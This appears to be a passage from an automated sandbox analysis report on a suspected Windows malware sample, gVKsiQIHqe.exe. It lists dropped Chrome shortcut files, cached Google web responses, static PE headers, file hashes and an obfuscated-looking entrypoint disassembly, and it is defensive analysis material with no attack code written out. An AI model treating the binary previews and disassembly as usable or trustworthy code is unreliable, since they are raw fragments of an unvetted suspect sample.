                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....4.v..T..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y0/....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y0/....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y0/....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y0/..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y2/...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........A........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2693
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.008120929197635
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8xtdwT0ksHpidAKZdA14tseh7sFiZUkmgqeh7sYy+BX:8xQPInqy
                                                                                                                                                                                                                                                                                    MD5:0F9B675289029F89449C1867907B3052
                                                                                                                                                                                                                                                                                    SHA1:C7403C89597F02702B78B8F9D4563A0D05E87A62
                                                                                                                                                                                                                                                                                    SHA-256:FD028528C10BEA4FBAC9BF7B1FBAC127234E815A2F4573D046B58034C3809EF6
                                                                                                                                                                                                                                                                                    SHA-512:147F6C7F4B568DE0D6B73C919A3E48FEA13B3C910DB81583B0EFEA0357ABF2F8BC11D6166BAFB9C21C0505261FEB9BC8F755ACC9355C2A5447D8EE7162173E08
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y0/....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y0/....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y0/....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y0/..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........A........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:57:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2681
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.996449601466567
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8LdwT0kcHpidAKZdA1vehDiZUkwqehCy+R:8WPrQy
                                                                                                                                                                                                                                                                                    MD5:37756DA6B14346E52E8EAD3BF35AD1AB
                                                                                                                                                                                                                                                                                    SHA1:204F38A01233B86D8C2319452E87B1EBEFE25185
                                                                                                                                                                                                                                                                                    SHA-256:0C64EF83154127CF1E008C0815B552AABE5880F2CDBFA9DFACFD701C2EB92E9D
                                                                                                                                                                                                                                                                                    SHA-512:36027F4F674AFE27E282608F79156C4B1869C84BC23B6E62D1F1149BFB8A260B4BD512D5175B599736F31CD0571257753500811D6CB8FEF501C6581869773A25
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,......q..T..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y0/....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y0/....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y0/....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y0/..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y2/...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........A........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:57:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2681
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9853383368413597
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8btdwT0kcHpidAKZdA1hehBiZUk1W1qehEy+C:8bQPr9ky
                                                                                                                                                                                                                                                                                    MD5:AC4B0C05129312CE7BDAE94E4DE16B3B
                                                                                                                                                                                                                                                                                    SHA1:D54493F3E2121594E6C34893EA8379489D12B23E
                                                                                                                                                                                                                                                                                    SHA-256:B81F82DD0916413518AEE8C871DD28E6CFFD8D3CEBCC9EA9EF9DA3A710065E92
                                                                                                                                                                                                                                                                                    SHA-512:E49EDBD6654C806F3C21BC9F7252DD40C8A3DA86DA71E489A0E11E5519E3DDF59A81F8449AD0AD32C15EA840D8979C600B1EEA6D5B8FA8C83CC5E98617D09496
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,.....3...T..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y0/....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y0/....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y0/....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y0/..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y2/...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........A........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:57:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2683
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9951460683486144
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8fdwT0kcHpidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbqy+yT+:86PLT/TbxWOvTbqy7T
                                                                                                                                                                                                                                                                                    MD5:CE09B5CF5B07FCDB6AD6C7CF54AC8CA0
                                                                                                                                                                                                                                                                                    SHA1:54EA2E7F8F252A448CF27D39DD328B64438AC519
                                                                                                                                                                                                                                                                                    SHA-256:E4F9ED6F56F6129C691170C12ECB0366DF94978F422A444E2A3735A587035553
                                                                                                                                                                                                                                                                                    SHA-512:07E79E34A53FEAE714A2418F7736D1E0093EB9FE8ADB6F57F1624EA924C6269B9ED54D529C2CB7BAB8C0E08899AF5975993ADF0CE9C09CD8D309FA9FA46352C4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,......Z..T..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y0/....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y0/....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y0/....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y0/..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y2/...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........A........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                    Chrome Cache Entry: 498

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (813)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):818
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.165542771644581
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:IdTLtTFNMidBHslgT9lCuABAT6k/K7uoB7HHHHHHHYqmffffffo:kFe6KlgZ01BAOkquSEqmffffffo
                                                                                                                                                                                                                                                                                    MD5:9E823781B688EE565E19C23CCDED779E
                                                                                                                                                                                                                                                                                    SHA1:9C9B67902727AA278AD6BAAA1E0EDA87FF6C0B2E
                                                                                                                                                                                                                                                                                    SHA-256:B1DE5FEAD3F8341A3DBFCC51B17AE97161599420E379ED63369BD392032D136D
                                                                                                                                                                                                                                                                                    SHA-512:01D0A99F41145FFAC900EC10593EC59BB44C578005B51342AEF02D931EFEF5BC43334A63378D643F4A258BBD12B3DDAD3A113FE61872CEA372A1E1C325F66615
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                    Preview:)]}'.["",["nascar track closing","winter park ski resort gondola","nasa astronauts stuck","new movies streaming","hilton honors devaluation","honey browser extension","louisiana meteor shower","bills patriots injury report"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":-2897169055230028149,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                                                                                                                                                                    Chrome Cache Entry: 499

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                    MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                                    Chrome Cache Entry: 500

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):132722
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.436342759568619
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:fXkJQ7O4N5dTm+syHEt4W3XdQ4Q6NuSr/nUW2i6o:fCQ7HTt/sHdQ4Q6NDfUW8o
                                                                                                                                                                                                                                                                                    MD5:D77ABCAFE3AAC96F200ACD44FBFE88D1
                                                                                                                                                                                                                                                                                    SHA1:DF652AC648E6349AD39E92B77443BC3D6506F34D
                                                                                                                                                                                                                                                                                    SHA-256:37C50C5F447472CFB212DEE1134FF9D4E00A8FE15BE6B2297682D78191FCAD19
                                                                                                                                                                                                                                                                                    SHA-512:BAD58E2B09C3C5ED8CBBF054F2037BD4BA109D50F635220B2B79A4AB4FF8B28E1997E38EF874072E671B608E3592449D8249F63E61B77193CDE02E8B4B98982E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                                    Chrome Cache Entry: 501

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):5162
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                    MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                    SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                    SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                    SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                                    Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                                                    Chrome Cache Entry: 502

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):1660
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                    MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                    SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                    SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                    SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.454638300665235
                                                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                    File name:gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File size:147'968 bytes
                                                                                                                                                                                                                                                                                    MD5:2e45d5934db7da8ff7b560a80ceb96ab
                                                                                                                                                                                                                                                                                    SHA1:e1d653b1a6acbacd6eb592041d21786ca3a633c8
                                                                                                                                                                                                                                                                                    SHA256:f2c2df5d625c6983881695ab53416c52aa574821e01074f607b6039e5d79e76f
                                                                                                                                                                                                                                                                                    SHA512:7caedba355fbf00ff68e17345ca7fdf79e2dba70c7284dc3bb7bfe4afc478f1f4ca4969ccf3080a391c138abf6f0d14b30e2832e3eaf4a3072519c08621c635a
                                                                                                                                                                                                                                                                                    SSDEEP:3072:lOBRrLUOPed9xOi756fJnhsRSK2C22/m4ESZo3XRYzXIkQfyIzdEpx:A/rLVPW0nsP2Xy+TJfVzW7
                                                                                                                                                                                                                                                                                    TLSH:B2E36C71A2C2A1B2CA4D33742A3E77FD9D709B222B04CDDBDBC4FC186E691D256B1416
                                                                                                                                                                                                                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ag.....................`....................@...........................#.............................................(......

                                                                                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                                                                                    Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Entrypoint:0x4185c0
                                                                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                    DLL Characteristics:NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                    Time Stamp:0x676198A3 [Tue Dec 17 15:28:35 2024 UTC]
                                                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                    Import Hash:8329c46c809815bc572f208fdd794284

                                                                                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                                                    je 00007F4CE8DB24E5h
                                                                                                                                                                                                                                                                                    jne 00007F4CE8DB24E3h
                                                                                                                                                                                                                                                                                    mov eax, 000046E8h
                                                                                                                                                                                                                                                                                    add byte ptr [ebx+eax+75h], dh
                                                                                                                                                                                                                                                                                    add dword ptr [eax-01754318h], edi
                                                                                                                                                                                                                                                                                    push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                                                    add dword ptr [eax-0175DD18h], edi
                                                                                                                                                                                                                                                                                    push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                                                    add dword ptr [eax-01747718h], edi
                                                                                                                                                                                                                                                                                    push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                                                    add dword ptr [eax-01746118h], edi
                                                                                                                                                                                                                                                                                    push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                                                    add dword ptr [eax-01740B18h], edi
                                                                                                                                                                                                                                                                                    push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                                                    add dword ptr [eax-00139518h], edi
